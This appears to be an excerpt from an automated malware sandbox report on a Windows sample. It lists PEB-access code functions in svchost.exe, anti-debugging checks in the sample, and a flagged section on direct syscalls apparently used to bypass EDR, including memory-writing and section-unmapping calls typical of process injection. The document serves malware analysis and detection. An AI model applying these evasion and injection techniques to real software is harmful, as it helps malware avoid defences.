            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F8BBE mov eax, dword ptr fs:[00000030h]1_2_034F8BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F8BBE mov eax, dword ptr fs:[00000030h]1_2_034F8BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F8BBE mov eax, dword ptr fs:[00000030h]1_2_034F8BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F8BBE mov eax, dword ptr fs:[00000030h]1_2_034F8BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345EA40 mov eax, dword ptr fs:[00000030h]1_2_0345EA40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345EA40 mov eax, dword ptr fs:[00000030h]1_2_0345EA40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034CAA40 mov eax, dword ptr fs:[00000030h]1_2_034CAA40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034CAA40 mov eax, dword ptr fs:[00000030h]1_2_034CAA40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B4A57 mov eax, dword ptr fs:[00000030h]1_2_034B4A57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B4A57 mov eax, dword ptr fs:[00000030h]1_2_034B4A57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346AA0E mov eax, dword ptr fs:[00000030h]1_2_0346AA0E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346AA0E mov eax, dword ptr fs:[00000030h]1_2_0346AA0E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440ACE mov eax, dword ptr fs:[00000030h]1_2_03440ACE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440ACE mov eax, dword ptr fs:[00000030h]1_2_03440ACE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D4AC2 mov eax, dword ptr fs:[00000030h]1_2_034D4AC2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D0AE0 mov eax, dword ptr fs:[00000030h]1_2_034D0AE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2AE0 mov eax, dword ptr fs:[00000030h]1_2_034D2AE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2AE0 mov eax, dword ptr fs:[00000030h]1_2_034D2AE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03450AEB mov eax, dword ptr fs:[00000030h]1_2_03450AEB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03450AEB mov eax, dword ptr fs:[00000030h]1_2_03450AEB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03450AEB mov eax, dword ptr fs:[00000030h]1_2_03450AEB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430AED mov eax, dword ptr fs:[00000030h]1_2_03430AED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430AED mov eax, dword ptr fs:[00000030h]1_2_03430AED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430AED mov eax, dword ptr fs:[00000030h]1_2_03430AED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B0AFF mov eax, dword ptr fs:[00000030h]1_2_034B0AFF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B0AFF mov eax, dword ptr fs:[00000030h]1_2_034B0AFF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B0AFF mov eax, dword ptr fs:[00000030h]1_2_034B0AFF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504AE8 mov eax, dword ptr fs:[00000030h]1_2_03504AE8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E6A80 mov eax, dword ptr fs:[00000030h]1_2_034E6A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C944 mov eax, dword ptr fs:[00000030h]1_2_0346C944
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E94E mov eax, dword ptr fs:[00000030h]1_2_0345E94E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03454955 mov eax, dword ptr fs:[00000030h]1_2_03454955
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03454955 mov eax, dword ptr fs:[00000030h]1_2_03454955
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C958 mov eax, dword ptr fs:[00000030h]1_2_0346C958
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344096B mov eax, dword ptr fs:[00000030h]1_2_0344096B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344096B mov eax, dword ptr fs:[00000030h]1_2_0344096B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436970 mov eax, dword ptr fs:[00000030h]1_2_03436970
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436970 mov eax, dword ptr fs:[00000030h]1_2_03436970
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436970 mov eax, dword ptr fs:[00000030h]1_2_03436970
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436970 mov eax, dword ptr fs:[00000030h]1_2_03436970
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436970 mov eax, dword ptr fs:[00000030h]1_2_03436970
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436970 mov eax, dword ptr fs:[00000030h]1_2_03436970
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436970 mov eax, dword ptr fs:[00000030h]1_2_03436970
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03486912 mov eax, dword ptr fs:[00000030h]1_2_03486912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03462919 mov eax, dword ptr fs:[00000030h]1_2_03462919
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03462919 mov eax, dword ptr fs:[00000030h]1_2_03462919
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F892E mov eax, dword ptr fs:[00000030h]1_2_034F892E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F892E mov eax, dword ptr fs:[00000030h]1_2_034F892E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AC920 mov ecx, dword ptr fs:[00000030h]1_2_034AC920
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AC920 mov eax, dword ptr fs:[00000030h]1_2_034AC920
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AC920 mov eax, dword ptr fs:[00000030h]1_2_034AC920
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AC920 mov eax, dword ptr fs:[00000030h]1_2_034AC920
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0348693A mov eax, dword ptr fs:[00000030h]1_2_0348693A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0348693A mov eax, dword ptr fs:[00000030h]1_2_0348693A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0348693A mov eax, dword ptr fs:[00000030h]1_2_0348693A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0350492D mov eax, dword ptr fs:[00000030h]1_2_0350492D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034389C0 mov eax, dword ptr fs:[00000030h]1_2_034389C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034389C0 mov eax, dword ptr fs:[00000030h]1_2_034389C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035029CF mov eax, dword ptr fs:[00000030h]1_2_035029CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035029CF mov eax, dword ptr fs:[00000030h]1_2_035029CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034309F0 mov eax, dword ptr fs:[00000030h]1_2_034309F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034649F0 mov eax, dword ptr fs:[00000030h]1_2_034649F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034649F0 mov eax, dword ptr fs:[00000030h]1_2_034649F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C98F mov eax, dword ptr fs:[00000030h]1_2_0346C98F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C98F mov eax, dword ptr fs:[00000030h]1_2_0346C98F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C98F mov eax, dword ptr fs:[00000030h]1_2_0346C98F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D0980 mov eax, dword ptr fs:[00000030h]1_2_034D0980
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D0980 mov eax, dword ptr fs:[00000030h]1_2_034D0980
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343E9A0 mov eax, dword ptr fs:[00000030h]1_2_0343E9A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343E9A0 mov eax, dword ptr fs:[00000030h]1_2_0343E9A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343E9A0 mov eax, dword ptr fs:[00000030h]1_2_0343E9A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343E9A0 mov eax, dword ptr fs:[00000030h]1_2_0343E9A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343E9A0 mov eax, dword ptr fs:[00000030h]1_2_0343E9A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343E9A0 mov eax, dword ptr fs:[00000030h]1_2_0343E9A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343E9A0 mov eax, dword ptr fs:[00000030h]1_2_0343E9A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343E9A0 mov eax, dword ptr fs:[00000030h]1_2_0343E9A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343E9A0 mov eax, dword ptr fs:[00000030h]1_2_0343E9A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B89A0 mov eax, dword ptr fs:[00000030h]1_2_034B89A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034689B0 mov edx, dword ptr fs:[00000030h]1_2_034689B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C69B0 mov eax, dword ptr fs:[00000030h]1_2_034C69B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C69B0 mov eax, dword ptr fs:[00000030h]1_2_034C69B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C69B0 mov ecx, dword ptr fs:[00000030h]1_2_034C69B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BC870 mov eax, dword ptr fs:[00000030h]1_2_034BC870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C819 mov eax, dword ptr fs:[00000030h]1_2_0346C819
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C819 mov eax, dword ptr fs:[00000030h]1_2_0346C819
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0835 mov eax, dword ptr fs:[00000030h]1_2_034E0835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0835 mov eax, dword ptr fs:[00000030h]1_2_034E0835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0835 mov eax, dword ptr fs:[00000030h]1_2_034E0835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0835 mov eax, dword ptr fs:[00000030h]1_2_034E0835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0835 mov eax, dword ptr fs:[00000030h]1_2_034E0835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0835 mov eax, dword ptr fs:[00000030h]1_2_034E0835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0835 mov eax, dword ptr fs:[00000030h]1_2_034E0835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0835 mov eax, dword ptr fs:[00000030h]1_2_034E0835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0835 mov eax, dword ptr fs:[00000030h]1_2_034E0835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0835 mov eax, dword ptr fs:[00000030h]1_2_034E0835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0835 mov eax, dword ptr fs:[00000030h]1_2_034E0835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0835 mov eax, dword ptr fs:[00000030h]1_2_034E0835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0835 mov eax, dword ptr fs:[00000030h]1_2_034E0835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034428C0 mov eax, dword ptr fs:[00000030h]1_2_034428C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034428C0 mov eax, dword ptr fs:[00000030h]1_2_034428C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034428C0 mov eax, dword ptr fs:[00000030h]1_2_034428C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034428C0 mov eax, dword ptr fs:[00000030h]1_2_034428C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034428C0 mov eax, dword ptr fs:[00000030h]1_2_034428C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034428C0 mov eax, dword ptr fs:[00000030h]1_2_034428C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034428C0 mov eax, dword ptr fs:[00000030h]1_2_034428C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034428C0 mov eax, dword ptr fs:[00000030h]1_2_034428C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034428C0 mov eax, dword ptr fs:[00000030h]1_2_034428C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034428C0 mov eax, dword ptr fs:[00000030h]1_2_034428C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034428C0 mov eax, dword ptr fs:[00000030h]1_2_034428C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034428C0 mov eax, dword ptr fs:[00000030h]1_2_034428C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034428C0 mov eax, dword ptr fs:[00000030h]1_2_034428C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034288C8 mov eax, dword ptr fs:[00000030h]1_2_034288C8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034288C8 mov eax, dword ptr fs:[00000030h]1_2_034288C8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034308CD mov eax, dword ptr fs:[00000030h]1_2_034308CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034308CD mov eax, dword ptr fs:[00000030h]1_2_034308CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A8F0 mov eax, dword ptr fs:[00000030h]1_2_0343A8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A8F0 mov eax, dword ptr fs:[00000030h]1_2_0343A8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A8F0 mov eax, dword ptr fs:[00000030h]1_2_0343A8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A8F0 mov eax, dword ptr fs:[00000030h]1_2_0343A8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A8F0 mov eax, dword ptr fs:[00000030h]1_2_0343A8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A8F0 mov eax, dword ptr fs:[00000030h]1_2_0343A8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034648F0 mov eax, dword ptr fs:[00000030h]1_2_034648F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C88FB mov eax, dword ptr fs:[00000030h]1_2_034C88FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B488F mov eax, dword ptr fs:[00000030h]1_2_034B488F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03456882 mov eax, dword ptr fs:[00000030h]1_2_03456882
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03456882 mov eax, dword ptr fs:[00000030h]1_2_03456882
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03456882 mov eax, dword ptr fs:[00000030h]1_2_03456882
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0347088E mov eax, dword ptr fs:[00000030h]1_2_0347088E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0347088E mov edx, dword ptr fs:[00000030h]1_2_0347088E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0347088E mov eax, dword ptr fs:[00000030h]1_2_0347088E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E8890 mov eax, dword ptr fs:[00000030h]1_2_034E8890
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E8890 mov eax, dword ptr fs:[00000030h]1_2_034E8890
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D0F49 mov eax, dword ptr fs:[00000030h]1_2_034D0F49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D0F49 mov eax, dword ptr fs:[00000030h]1_2_034D0F49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D0F49 mov eax, dword ptr fs:[00000030h]1_2_034D0F49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EAF50 mov ecx, dword ptr fs:[00000030h]1_2_034EAF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EEF66 mov eax, dword ptr fs:[00000030h]1_2_034EEF66
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504F7C mov eax, dword ptr fs:[00000030h]1_2_03504F7C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345AF72 mov eax, dword ptr fs:[00000030h]1_2_0345AF72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03486F70 mov eax, dword ptr fs:[00000030h]1_2_03486F70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342EF79 mov eax, dword ptr fs:[00000030h]1_2_0342EF79
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342EF79 mov eax, dword ptr fs:[00000030h]1_2_0342EF79
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342EF79 mov eax, dword ptr fs:[00000030h]1_2_0342EF79
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344CF00 mov eax, dword ptr fs:[00000030h]1_2_0344CF00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344CF00 mov eax, dword ptr fs:[00000030h]1_2_0344CF00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504F1D mov eax, dword ptr fs:[00000030h]1_2_03504F1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03470F16 mov eax, dword ptr fs:[00000030h]1_2_03470F16
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03470F16 mov eax, dword ptr fs:[00000030h]1_2_03470F16
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03470F16 mov eax, dword ptr fs:[00000030h]1_2_03470F16
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03470F16 mov eax, dword ptr fs:[00000030h]1_2_03470F16
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B8F3C mov eax, dword ptr fs:[00000030h]1_2_034B8F3C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B8F3C mov eax, dword ptr fs:[00000030h]1_2_034B8F3C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B8F3C mov ecx, dword ptr fs:[00000030h]1_2_034B8F3C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B8F3C mov ecx, dword ptr fs:[00000030h]1_2_034B8F3C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EEFD3 mov eax, dword ptr fs:[00000030h]1_2_034EEFD3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DAFD0 mov eax, dword ptr fs:[00000030h]1_2_034DAFD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DAFD0 mov eax, dword ptr fs:[00000030h]1_2_034DAFD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DAFD0 mov eax, dword ptr fs:[00000030h]1_2_034DAFD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DAFD0 mov eax, dword ptr fs:[00000030h]1_2_034DAFD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03446FE0 mov eax, dword ptr fs:[00000030h]1_2_03446FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03446FE0 mov ecx, dword ptr fs:[00000030h]1_2_03446FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03446FE0 mov ecx, dword ptr fs:[00000030h]1_2_03446FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03446FE0 mov eax, dword ptr fs:[00000030h]1_2_03446FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03446FE0 mov ecx, dword ptr fs:[00000030h]1_2_03446FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03446FE0 mov ecx, dword ptr fs:[00000030h]1_2_03446FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03446FE0 mov eax, dword ptr fs:[00000030h]1_2_03446FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03446FE0 mov eax, dword ptr fs:[00000030h]1_2_03446FE0
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_00426DA1 CreateFileW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,SetEndOfFile,GetLastError,0_2_00426DA1
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0042202E SetUnhandledExceptionFilter,0_2_0042202E
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_004230F5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004230F5
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_00417D93 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00417D93
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00421FA7

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeNtCreateFile: Direct from: 0x771C2F0CJump to behavior
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeNtSetInformationThread: Direct from: 0x771B6319Jump to behavior
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeNtQueryVolumeInformationFile: Direct from: 0x771C2E4CJump to behavior
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeNtDeviceIoControlFile: Direct from: 0x771C2A0CJump to behavior
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeNtAllocateVirtualMemory: Direct from: 0x771C2B0CJump to behavior
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeNtOpenSection: Direct from: 0x771C2D2CJump to behavior
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeNtQuerySystemInformation: Direct from: 0x771C47ECJump to behavior
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeNtClose: Direct from: 0x771C2A8C
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeNtCreateKey: Direct from: 0x771C2B8CJump to behavior
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeNtSetInformationThread: Direct from: 0x771C2A6CJump to behavior
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeNtQueryAttributesFile: Direct from: 0x771C2D8CJump to behavior
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeNtAllocateVirtualMemory: Direct from: 0x771C480CJump to behavior
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeNtQueryInformationProcess: Direct from: 0x771C2B46Jump to behavior
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeNtResumeThread: Direct from: 0x771C2EDCJump to behavior
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeNtCreateUserProcess: Direct from: 0x771C363CJump to behavior
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeNtWriteVirtualMemory: Direct from: 0x771C482CJump to behavior
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeNtProtectVirtualMemory: Direct from: 0x771C2EBCJump to behavior
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeNtDelayExecution: Direct from: 0x771C2CFCJump to behavior
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeNtOpenKeyEx: Direct from: 0x771C2ABCJump to behavior
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeNtResumeThread: Direct from: 0x771C35CCJump to behavior
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeNtAllocateVirtualMemory: Direct from: 0x771C2B1CJump to behavior
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeNtReadFile: Direct from: 0x771C29FCJump to behavior
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeNtQuerySystemInformation: Direct from: 0x771C2D1CJump to behavior
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeNtUnmapViewOfSection: Direct from: 0x771C2C5CJump to behavior
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeNtNotifyChangeKey: Direct from: 0x771C3B4CJump to behavior
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeNtWriteVirtualMemory: Direct from: 0x771C2D5CJump to behavior
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeNtMapViewOfSection: Direct from: 0x771C2C3CJump to behavior
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeNtSetInformationProcess: Direct from: 0x771C2B7CJump to behavior
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeNtReadVirtualMemory: Direct from: 0x771C2DACJump to behavior
